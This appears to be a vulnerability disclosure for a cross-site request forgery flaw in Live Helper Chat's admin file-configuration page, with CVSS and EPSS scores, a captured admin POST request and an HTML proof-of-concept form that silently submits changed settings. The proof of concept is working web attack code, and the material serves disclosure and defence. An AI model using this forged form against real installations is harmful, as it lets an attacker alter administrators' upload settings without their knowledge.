Shubh123-triADAF98CF-60AB-40E0-AA3B-42BA0D3B7CBFCross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
30.1%
Description
A CSRF issue is found in the Settings>Live help configuration>File Configuration. It was found that no CSRF token validation is getting done as no CSRF token is getting passed with the request.
Proof of Concept
Actual Request
POST /site_admin/file/configuration HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 395
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/file/configuration
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=dqj88jnn7p3es1tjobhpvckfj5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
ActiveFileUploadUser=on&ActiveFileUploadAdmin=on&AllowedFileTypes=gif%7Cjpe%3Fg%7Cpng%7Czip%7Crar%7Cxls%7Cdoc%7Cdocx%7Cxlsx%7Cpdf%7Cmp3&AllowedFileTypesUser=gif%7Cjpe%3Fg%7Cpng%7Cdoc%7Cdocx%7Cpdf%7Cmp3&MaximumFileSize=2048&ClamAVSocketPath=%2Fvar%2Frun%2Fclamav%2Fclamd.sock&ClamAVSocketLength=20000&soundMessagesOp=on&soundLength=30&mdays_older=&mdays_older_visitor=&StoreFileConfiguration=Save
You can see that NO CSRF token is getting sent along with the request.
Attacker’s POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.livehelperchat.com/site_admin/file/configuration" method="POST">
<input type="hidden" name="ActiveFileUploadUser" value="on" />
<input type="hidden" name="ActiveFileUploadAdmin" value="on" />
<input type="hidden" name="AllowedFileTypes" value="gif|jpe?g|png|zip|rar|xls|doc|docx|xlsx|pdf|mp3" />
<input type="hidden" name="AllowedFileTypesUser" value="gif|jpe?g|png|doc|docx|pdf|mp3" />
<input type="hidden" name="MaximumFileSize" value="2048" />
<input type="hidden" name="ClamAVSocketPath" value="/var/run/clamav/clamd.sock" />
<input type="hidden" name="ClamAVSocketLength" value="20000" />
<input type="hidden" name="soundMessagesOp" value="on" />
<input type="hidden" name="soundLength" value="30" />
<input type="hidden" name="mdays_older" value="" />
<input type="hidden" name="mdays_older_visitor" value="" />
<input type="hidden" name="StoreFileConfiguration" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact
This vulnerability can help an attacker to change the admin file configuration settings.
Related
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
0.001 Low
EPSS
Percentile
30.1%